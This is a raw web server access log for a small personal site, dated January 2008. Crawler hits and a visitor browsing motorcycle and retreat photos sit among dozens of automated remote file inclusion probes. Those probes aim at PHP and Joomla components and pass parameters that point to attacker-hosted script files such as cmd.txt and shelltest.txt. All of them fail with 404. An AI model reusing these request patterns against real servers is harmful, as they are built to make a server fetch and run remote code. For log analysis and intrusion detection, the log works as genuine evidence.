193.252.149.15 - - [31/Jan/2008:14:09:20 -0800] "GET /robots.txt HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; fr; rv:1.8.1) VoilaBot BETA 1.2 (http://www.voila.com/)" "www.dmulk.com"
193.252.149.15 - - [31/Jan/2008:14:09:22 -0800] "GET /presto/ HTTP/1.1" 200 526 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; fr; rv:1.8.1) VoilaBot BETA 1.2 (http://www.voila.com/)" "www.dmulk.com"
66.79.163.220 - - [31/Jan/2008:14:09:40 -0800] "GET /logs/access_080101.log/index.php?redir=http://www.geocities.com/paddy.only/cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.79.163.220 - - [31/Jan/2008:14:09:40 -0800] "GET /index.php?redir=http://www.geocities.com/paddy.only/cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.79.163.220 - - [31/Jan/2008:14:09:40 -0800] "GET /logs/index.php?redir=http://www.geocities.com/paddy.only/cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.79.163.220 - - [31/Jan/2008:14:10:45 -0800] "GET /logs/access.log/index.php?redir=http://www.geocities.com/paddy.only/cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
89.111.176.57 - - [31/Jan/2008:14:10:48 -0800] "GET /akocomments.php?mosConfig_absolute_path=http://www.freewebtown.com/scanr0x/1/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.202.116.18 - - [31/Jan/2008:14:11:17 -0800] "GET //modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://albaworld.extra.hu/c9?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
82.194.74.238 - - [31/Jan/2008:14:12:50 -0800] "GET //administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.littleknownsecrets.com/images/gallery2.gif?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.0; SunOS 5.9 sun4u; X11)" "www.dmulk.com"
82.194.74.238 - - [31/Jan/2008:14:12:50 -0800] "GET /logs//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.littleknownsecrets.com/images/gallery2.gif?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; PPC; 240x320)" "www.dmulk.com"
83.223.98.160 - - [31/Jan/2008:14:12:52 -0800] "GET /logs/access_071225.log/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.imigrant.ro/cache/new? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
83.223.98.160 - - [31/Jan/2008:14:12:52 -0800] "GET /logs/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.imigrant.ro/cache/new? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.6.29.19 - - [31/Jan/2008:14:14:40 -0800] "GET /tmp/ HTTP/1.0" 200 812 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
212.40.65.18 - - [31/Jan/2008:14:15:26 -0800] "GET /tools/send_reminders.php?noSet=0&includedir=http://kaizo.100webspace.net/xnew/bda.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
212.40.65.18 - - [31/Jan/2008:14:15:30 -0800] "GET /tools/send_reminders.php?noSet=0&includedir=http://kaizo.100webspace.net/xnew/bda.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.17.114.133 - - [31/Jan/2008:14:15:46 -0800] "GET /index.php?redir=http://www.freewebtown.com/scanr0x/1/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
212.40.65.18 - - [31/Jan/2008:14:16:10 -0800] "GET /logs/access_071229.log/tools/send_reminders.php?noSet=0&includedir=http://kaizo.100webspace.net/xnew/bda.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
212.40.65.18 - - [31/Jan/2008:14:16:10 -0800] "GET /logs/access_071229.log/tools/send_reminders.php?noSet=0&includedir=http://kaizo.100webspace.net/xnew/bda.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
212.40.65.18 - - [31/Jan/2008:14:16:11 -0800] "GET /tools/send_reminders.php?noSet=0&includedir=http://kaizo.100webspace.net/xnew/bda.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
212.40.65.18 - - [31/Jan/2008:14:16:11 -0800] "GET /tools/send_reminders.php?noSet=0&includedir=http://kaizo.100webspace.net/xnew/bda.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
212.40.65.18 - - [31/Jan/2008:14:16:11 -0800] "GET /logs/tools/send_reminders.php?noSet=0&includedir=http://kaizo.100webspace.net/xnew/bda.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
212.40.65.18 - - [31/Jan/2008:14:16:11 -0800] "GET /logs/tools/send_reminders.php?noSet=0&includedir=http://kaizo.100webspace.net/xnew/bda.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
210.245.164.10 - - [31/Jan/2008:14:16:24 -0800] "GET /akocomments.php?mosConfig_absolute_path=http://www.freewebtown.com/scanr0x/1/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
212.40.65.18 - - [31/Jan/2008:14:16:43 -0800] "GET /logs/access_071229.log/tools/send_reminders.php?noSet=0&includedir=http://kaizo.100webspace.net/xnew/bda.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
212.40.65.18 - - [31/Jan/2008:14:16:43 -0800] "GET /tools/send_reminders.php?noSet=0&includedir=http://kaizo.100webspace.net/xnew/bda.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
212.40.65.18 - - [31/Jan/2008:14:16:43 -0800] "GET /logs/access_071229.log/tools/send_reminders.php?noSet=0&includedir=http://kaizo.100webspace.net/xnew/bda.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
212.40.65.18 - - [31/Jan/2008:14:16:43 -0800] "GET /logs/tools/send_reminders.php?noSet=0&includedir=http://kaizo.100webspace.net/xnew/bda.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
212.40.65.18 - - [31/Jan/2008:14:16:44 -0800] "GET /tools/send_reminders.php?noSet=0&includedir=http://kaizo.100webspace.net/xnew/bda.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
212.40.65.18 - - [31/Jan/2008:14:16:44 -0800] "GET /logs/tools/send_reminders.php?noSet=0&includedir=http://kaizo.100webspace.net/xnew/bda.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
212.40.65.18 - - [31/Jan/2008:14:16:50 -0800] "GET /logs/tools/send_reminders.php?noSet=0&includedir=http://puerco.altervista.org/new/floder.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511" "www.dmulk.com"
212.40.65.18 - - [31/Jan/2008:14:16:50 -0800] "GET /tools/send_reminders.php?noSet=0&includedir=http://puerco.altervista.org/new/floder.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511" "www.dmulk.com"
212.40.65.18 - - [31/Jan/2008:14:16:51 -0800] "GET /tools/send_reminders.php?noSet=0&includedir=http://kaizo.hut2.ru/new/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/1.22 (compatible; MSIE 1.5; Windows NT)" "www.dmulk.com"
212.40.65.18 - - [31/Jan/2008:14:16:51 -0800] "GET /logs/tools/send_reminders.php?noSet=0&includedir=http://kaizo.hut2.ru/new/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/1.22 (compatible; MSIE 1.5; Windows NT)" "www.dmulk.com"
212.40.65.18 - - [31/Jan/2008:14:17:02 -0800] "GET /logs/access_071229.log/tools/send_reminders.php?noSet=0&includedir=http://kaizo.100webspace.net/xnew/bda.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
212.40.65.18 - - [31/Jan/2008:14:17:03 -0800] "GET /tools/send_reminders.php?noSet=0&includedir=http://kaizo.100webspace.net/xnew/bda.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
212.40.65.18 - - [31/Jan/2008:14:17:03 -0800] "GET /logs/tools/send_reminders.php?noSet=0&includedir=http://kaizo.100webspace.net/xnew/bda.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
194.58.105.34 - - [31/Jan/2008:14:17:11 -0800] "GET /logs//administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.apnic.net/index.html? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
194.58.105.34 - - [31/Jan/2008:14:17:11 -0800] "GET //administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.apnic.net/index.html? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
212.40.65.18 - - [31/Jan/2008:14:17:16 -0800] "GET /logs/access_071229.log/tools/send_reminders.php?noSet=0&includedir=http://kaizo.100webspace.net/xnew/bda.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
212.40.65.18 - - [31/Jan/2008:14:17:16 -0800] "GET /tools/send_reminders.php?noSet=0&includedir=http://kaizo.100webspace.net/xnew/bda.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
212.40.65.18 - - [31/Jan/2008:14:17:16 -0800] "GET /logs/tools/send_reminders.php?noSet=0&includedir=http://kaizo.100webspace.net/xnew/bda.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
212.40.65.18 - - [31/Jan/2008:14:17:22 -0800] "GET /logs/access_071229.log/tools/send_reminders.php?noSet=0&includedir=http://kaizo.100webspace.net/xnew/bda.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
212.40.65.18 - - [31/Jan/2008:14:17:22 -0800] "GET /tools/send_reminders.php?noSet=0&includedir=http://kaizo.100webspace.net/xnew/bda.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
212.40.65.18 - - [31/Jan/2008:14:17:22 -0800] "GET /logs/tools/send_reminders.php?noSet=0&includedir=http://kaizo.100webspace.net/xnew/bda.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
212.40.65.18 - - [31/Jan/2008:14:17:23 -0800] "GET /logs/access_071229.log/tools/send_reminders.php?noSet=0&includedir=http://kaizo.100webspace.net/xnew/bda.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
212.40.65.18 - - [31/Jan/2008:14:17:23 -0800] "GET /tools/send_reminders.php?noSet=0&includedir=http://kaizo.100webspace.net/xnew/bda.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
212.40.65.18 - - [31/Jan/2008:14:17:24 -0800] "GET /logs/tools/send_reminders.php?noSet=0&includedir=http://kaizo.100webspace.net/xnew/bda.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.92.175.138 - - [31/Jan/2008:14:18:19 -0800] "GET /administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://askastro.com/bo.do?? HTTP/1.1" 404 275 "-" "Microsoft Internet Explorer/4.0b1 (Windows 95)" "www.dmulk.com"
64.92.175.138 - - [31/Jan/2008:14:18:19 -0800] "GET /logs/administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://askastro.com/bo.do?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007" "www.dmulk.com"
64.123.108.73 - - [31/Jan/2008:14:18:56 -0800] "GET //skin/zero_vote/ask_password.php?dir=http://www.californiasecession.org/discuss/images/themes/obb108/.jst/figo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.252.148.190 - - [31/Jan/2008:14:19:36 -0800] "GET /logs/access_071230.log/index&id=http://www.gilmores.ie/modules/di?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.252.148.190 - - [31/Jan/2008:14:19:37 -0800] "GET /index&id=http://www.gilmores.ie/modules/di?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.252.148.190 - - [31/Jan/2008:14:19:37 -0800] "GET /logs/index&id=http://www.gilmores.ie/modules/di?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.30.214.232 - - [31/Jan/2008:14:24:07 -0800] "GET /logs/access_071230.log HTTP/1.0" 200 231687 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
82.98.78.121 - - [31/Jan/2008:14:25:21 -0800] "GET /administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://www.ar-vision.com/z.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.160.246.215 - - [31/Jan/2008:14:25:41 -0800] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.aulaenred.net/interact/includes/w.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.7C-CCK-MCD {C-UDP; EBM-APPLE} (Macintosh; I; PPC)" "www.dmulk.com"
217.160.246.215 - - [31/Jan/2008:14:25:41 -0800] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.aulaenred.net/interact/includes/w.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.7C-CCK-MCD {C-UDP; EBM-APPLE} (Macintosh; I; PPC)" "www.dmulk.com"
217.160.246.215 - - [31/Jan/2008:14:25:41 -0800] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://hrpi3.100webspace.net/phpBB2/language/lang_english/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.dmulk.com"
217.160.246.215 - - [31/Jan/2008:14:25:41 -0800] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://hrpi3.100webspace.net/phpBB2/language/lang_english/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.dmulk.com"
200.80.35.36 - - [31/Jan/2008:14:27:07 -0800] "GET //administrator/components/com_chronocontact/excelwriter/Writer.php?mosConfig_absolute_path=http://mobee.ru/usr/xml/c?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
200.80.35.36 - - [31/Jan/2008:14:31:01 -0800] "GET //administrator/components/com_chronocontact/excelwriter/PPS.php?mosConfig_absolute_pathhttp://mobee.ru/usr/xml/c?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
74.6.27.33 - - [31/Jan/2008:14:31:10 -0800] "GET /tmp/?M=A HTTP/1.0" 200 815 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
81.52.143.15 - - [31/Jan/2008:14:31:13 -0800] "GET /robots.txt HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; fr; rv:1.8.1) VoilaBot BETA 1.2 (http://www.voila.com/)" "www.dmulk.com"
81.52.143.15 - - [31/Jan/2008:14:31:25 -0800] "GET /presto/?M=A HTTP/1.1" 200 526 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; fr; rv:1.8.1) VoilaBot BETA 1.2 (http://www.voila.com/)" "www.dmulk.com"
82.98.78.121 - - [31/Jan/2008:14:31:29 -0800] "GET /logs/access_080106.log/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://www.ar-vision.com/z.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
82.98.78.121 - - [31/Jan/2008:14:31:30 -0800] "GET /logs/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://www.ar-vision.com/z.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
212.227.92.45 - - [31/Jan/2008:14:31:30 -0800] "GET /logs/access_080117.log/administrator/components/com_chronocontact/excelwriter/Writer.php?mosConfig_absolute_path=http://www.depza.biz/abank/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
212.227.92.45 - - [31/Jan/2008:14:31:36 -0800] "GET /administrator/components/com_chronocontact/excelwriter/Writer.php?mosConfig_absolute_path=http://www.depza.biz/abank/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
212.227.92.45 - - [31/Jan/2008:14:31:41 -0800] "GET /logs/administrator/components/com_chronocontact/excelwriter/Writer.php?mosConfig_absolute_path=http://www.depza.biz/abank/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
76.176.174.98 - - [31/Jan/2008:14:32:52 -0800] "GET / HTTP/1.1" 200 2962 "http://www.google.com/search?hl=en&q=dmulk&btnG=Search" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.11) Gecko/20071127 Firefox/2.0.0.11" "www.dmulk.com"
76.176.174.98 - - [31/Jan/2008:14:32:52 -0800] "GET /favicon.ico HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.11) Gecko/20071127 Firefox/2.0.0.11" "www.dmulk.com"
189.145.96.92 - - [31/Jan/2008:14:32:55 -0800] "GET /logs/access_071230.log//modules/vwar/admin/admin.php?vwar_root=http://72.1.78.162/echow.txt?????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
76.176.174.98 - - [31/Jan/2008:14:32:56 -0800] "GET /favicon.ico HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.11) Gecko/20071127 Firefox/2.0.0.11" "www.dmulk.com"
189.145.96.92 - - [31/Jan/2008:14:32:56 -0800] "GET //modules/vwar/admin/admin.php?vwar_root=http://72.1.78.162/echow.txt?????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
189.145.96.92 - - [31/Jan/2008:14:32:57 -0800] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://72.1.78.162/echow.txt?????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
76.176.174.98 - - [31/Jan/2008:14:33:11 -0800] "GET /presto/ HTTP/1.1" 200 526 "http://www.dmulk.com/" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.11) Gecko/20071127 Firefox/2.0.0.11" "www.dmulk.com"
76.176.174.98 - - [31/Jan/2008:14:33:18 -0800] "GET /minamijewelry/ HTTP/1.1" 200 2110 "http://www.dmulk.com/" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.11) Gecko/20071127 Firefox/2.0.0.11" "www.dmulk.com"
76.176.174.98 - - [31/Jan/2008:14:33:25 -0800] "GET /bikes/ HTTP/1.1" 200 2184 "http://www.dmulk.com/" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.11) Gecko/20071127 Firefox/2.0.0.11" "www.dmulk.com"
76.176.174.98 - - [31/Jan/2008:14:33:31 -0800] "GET /bikes/IMG_1188.jpg HTTP/1.1" 200 2700842 "http://www.dmulk.com/bikes/" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.11) Gecko/20071127 Firefox/2.0.0.11" "www.dmulk.com"
76.176.174.98 - - [31/Jan/2008:14:33:44 -0800] "GET /bikes/IMG_1192.jpg HTTP/1.1" 200 3904179 "http://www.dmulk.com/bikes/" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.11) Gecko/20071127 Firefox/2.0.0.11" "www.dmulk.com"
76.176.174.98 - - [31/Jan/2008:14:33:47 -0800] "GET /bikes/vfr750b.jpg HTTP/1.1" 200 194464 "http://www.dmulk.com/bikes/" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.11) Gecko/20071127 Firefox/2.0.0.11" "www.dmulk.com"
76.176.174.98 - - [31/Jan/2008:14:33:57 -0800] "GET /bikes/IMG_1190.jpg HTTP/1.1" 200 4638710 "http://www.dmulk.com/bikes/" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.11) Gecko/20071127 Firefox/2.0.0.11" "www.dmulk.com"
76.176.174.98 - - [31/Jan/2008:14:34:07 -0800] "GET /bikes/IMG_1189.jpg HTTP/1.1" 200 1114112 "http://www.dmulk.com/bikes/" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.11) Gecko/20071127 Firefox/2.0.0.11" "www.dmulk.com"
76.176.174.98 - - [31/Jan/2008:14:34:09 -0800] "GET /bikes/vfr750d.jpg HTTP/1.1" 200 237846 "http://www.dmulk.com/bikes/" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.11) Gecko/20071127 Firefox/2.0.0.11" "www.dmulk.com"
76.176.174.98 - - [31/Jan/2008:14:34:17 -0800] "GET /retreat1/ HTTP/1.1" 200 15081 "http://www.dmulk.com/" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.11) Gecko/20071127 Firefox/2.0.0.11" "www.dmulk.com"
76.176.174.98 - - [31/Jan/2008:14:34:21 -0800] "GET /retreat1/IMG_2670.JPG HTTP/1.1" 200 2701196 "http://www.dmulk.com/retreat1/" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.11) Gecko/20071127 Firefox/2.0.0.11" "www.dmulk.com"
76.176.174.98 - - [31/Jan/2008:14:34:27 -0800] "GET /retreat1/IMG_2679.JPG HTTP/1.1" 200 2097152 "http://www.dmulk.com/retreat1/" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.11) Gecko/20071127 Firefox/2.0.0.11" "www.dmulk.com"
76.176.174.98 - - [31/Jan/2008:14:34:31 -0800] "GET /retreat1/IMG_2683.JPG HTTP/1.1" 200 2162688 "http://www.dmulk.com/retreat1/" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.11) Gecko/20071127 Firefox/2.0.0.11" "www.dmulk.com"
200.80.35.36 - - [31/Jan/2008:14:34:52 -0800] "GET //administrator/components/com_chronocontact/excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_pathhttp://mobee.ru/usr/xml/c?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
212.92.23.94 - - [31/Jan/2008:14:35:46 -0800] "GET /logs/access_080103.log/header.php?base_folder=http://64.40.146.64/shelltest.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
212.92.23.94 - - [31/Jan/2008:14:35:46 -0800] "GET /header.php?base_folder=http://64.40.146.64/shelltest.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
212.92.23.94 - - [31/Jan/2008:14:35:47 -0800] "GET /logs/header.php?base_folder=http://64.40.146.64/shelltest.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
74.6.20.227 - - [31/Jan/2008:14:36:02 -0800] "GET /logs/access_071201.log HTTP/1.0" 200 44753 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
64.185.237.143 - - [31/Jan/2008:14:37:18 -0800] "GET /mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://jascar.es/css/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Avant Browser [avantbrowser.com]; iOpus-I-M; QXW03416; .NET CLR 1.1.4322)" "www.dmulk.com"
64.185.237.143 - - [31/Jan/2008:14:37:18 -0800] "GET /logs/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://jascar.es/css/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Avant Browser [avantbrowser.com]; iOpus-I-M; QXW03416; .NET CLR 1.1.4322)" "www.dmulk.com"
212.92.23.94 - - [31/Jan/2008:14:37:31 -0800] "GET /logs/access_071220.log/header.php?base_folder=http://64.40.146.64/shelltest.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
212.227.92.45 - - [31/Jan/2008:14:38:14 -0800] "GET /logs/access_071230.log/administrator/components/com_chronocontact/excelwriter/Writer.php?mosConfig_absolute_path=http://www.depza.biz/abank/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
209.35.191.105 - - [31/Jan/2008:14:39:34 -0800] "GET /logs/access_080101.log/index.php?redir=http://www.bakhshian.ir/language/lang/alba.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.dmulk.com"
209.35.191.105 - - [31/Jan/2008:14:39:35 -0800] "GET /logs/index.php?redir=http://www.bakhshian.ir/language/lang/alba.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.dmulk.com"
128.49.185.167 - - [31/Jan/2008:14:40:05 -0800] "GET /bikes/dteel/2008_01_26/IMG_4341M.JPG HTTP/1.1" 304 - "http://www.st-owners.com/forums/showthread.php?t=32353" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; InfoPath.2)" "www.dmulk.com"
128.49.185.167 - - [31/Jan/2008:14:40:05 -0800] "GET /bikes/dteel/2008_01_26/IMG_4338M.JPG HTTP/1.1" 304 - "http://www.st-owners.com/forums/showthread.php?t=32353" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; InfoPath.2)" "www.dmulk.com"
128.49.185.167 - - [31/Jan/2008:14:40:05 -0800] "GET /bikes/dteel/2008_01_26/IMG_4346M.JPG HTTP/1.1" 304 - "http://www.st-owners.com/forums/showthread.php?t=32353" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; InfoPath.2)" "www.dmulk.com"
128.49.185.167 - - [31/Jan/2008:14:40:05 -0800] "GET /bikes/dteel/2008_01_26/IMG_4347M.JPG HTTP/1.1" 304 - "http://www.st-owners.com/forums/showthread.php?t=32353" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; InfoPath.2)" "www.dmulk.com"
128.49.185.167 - - [31/Jan/2008:14:40:05 -0800] "GET /bikes/dteel/2008_01_26/IMG_4349M.JPG HTTP/1.1" 304 - "http://www.st-owners.com/forums/showthread.php?t=32353" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; InfoPath.2)" "www.dmulk.com"
128.49.185.167 - - [31/Jan/2008:14:40:05 -0800] "GET /bikes/dteel/2008_01_26/IMG_4352M.JPG HTTP/1.1" 304 - "http://www.st-owners.com/forums/showthread.php?t=32353" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; InfoPath.2)" "www.dmulk.com"
128.49.185.167 - - [31/Jan/2008:14:40:05 -0800] "GET /bikes/dteel/2008_01_26/IMG_4354M.JPG HTTP/1.1" 304 - "http://www.st-owners.com/forums/showthread.php?t=32353" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; InfoPath.2)" "www.dmulk.com"
128.49.185.167 - - [31/Jan/2008:14:40:05 -0800] "GET /bikes/dteel/2008_01_26/IMG_4356M.JPG HTTP/1.1" 304 - "http://www.st-owners.com/forums/showthread.php?t=32353" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; InfoPath.2)" "www.dmulk.com"
128.49.185.167 - - [31/Jan/2008:14:40:05 -0800] "GET /bikes/dteel/2008_01_27/Medium/IMG_4359M.JPG HTTP/1.1" 304 - "http://www.st-owners.com/forums/showthread.php?t=32353" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; InfoPath.2)" "www.dmulk.com"
128.49.185.167 - - [31/Jan/2008:14:40:05 -0800] "GET /bikes/dteel/2008_01_27/Medium/IMG_4360M.JPG HTTP/1.1" 304 - "http://www.st-owners.com/forums/showthread.php?t=32353" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; InfoPath.2)" "www.dmulk.com"
